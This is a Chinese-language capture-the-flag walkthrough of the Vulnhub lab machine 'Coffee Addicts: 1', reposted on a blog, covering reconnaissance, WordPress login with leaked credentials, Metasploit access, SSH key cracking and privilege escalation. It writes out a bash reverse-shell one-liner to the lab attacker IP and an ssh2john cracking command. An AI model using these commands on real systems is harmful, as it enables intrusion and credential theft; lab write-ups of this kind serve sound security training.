Vulnhub 靶场 COFFEE ADDICTS: 1

前期准备:

靶机地址:https://www.vulnhub.com/entry/coffee-addicts-1,699/

kali攻击机ip:192.168.11.129
靶机ip:192.168.11.143

一、信息收集

1.使用nmap对目标靶机进行扫描

image

发下开放了22和80端口。

2. 80端口

image

把 coffeeaddicts.thm 添加到 hosts 文件:

image

说网站已被入侵,扫一下目录:

image

发现 wordpress:

image

查看页面信息:

image

查看评论发现信息,问这是不是你的密码,回答说可能是,问的密码应该是 gus i need you back。

wpscan 扫一下用户名:

image

所以用户名是 gus,密码是 gusineedyouback,扫一下 wordpress 目录下的登录界面:

image

发现 /wp-login.php 登录界面:

image

用上面的用户名密码登录:

image

登录进系统。

二、漏洞利用

在网站中可以进行上传反弹 shell 文件添加或更换页面等操作,之前的靶机都是这么做的,这次用 msf 做:

image

设置一下目标主机、端口用户名密码等信息:

image

run 运行后输入 shell -t

image

在 msf 中用 shell 有很多地方不方便:

image

写个 shell 再连接:

bash -c 'bash -i >& /dev/tcp/192.168.11.129/1235 0>&1'

image

image

升级一下 shell,查看系统内的文件和权限:

image

在 /home/gus 目录下发现一个 flag,查看 readme.txt:

image

说删除了用户 gus 的管理权限。查看另一个家目录:

image

发现了私钥,复制下来利用 ssh2john.py 处理爆破一下:

python3 /usr/share/john/ssh2john.py id_rsa | tee hash

image

image

解得密码是 password,ssh 登录:

image

三、提权

查看下权限:

image

直接查看看不了,所幸有 C++ 源码:

image

image

发现这个程序接受输入并将其存储在命令中。然后,它在字符串的末尾添加空字符并将其复制到一个新的字符数组 cstr 中。所以用它可以执行任何命令:

image

得到 root 权限,查看 flag:

image

完成。

原文链接: https://www.cnblogs.com/sainet/p/15782481.html

欢迎关注

微信关注下方公众号,第一时间获取干货硬货;公众号内回复【pdf】免费获取数百本计算机经典书籍

    Vulnhub 靶场 COFFEE ADDICTS: 1

原创文章受到原创版权保护。转载请注明出处:https://www.ccppcoding.com/archives/184464

非原创文章文中已经注明原地址,如有侵权,联系删除

关注公众号【高性能架构探索】,第一时间获取最新文章

转载文章受原作者版权保护。转载请注明原作者出处!

(0)
上一篇 2023年2月12日 上午10:44
下一篇 2023年2月12日 上午10:44

相关推荐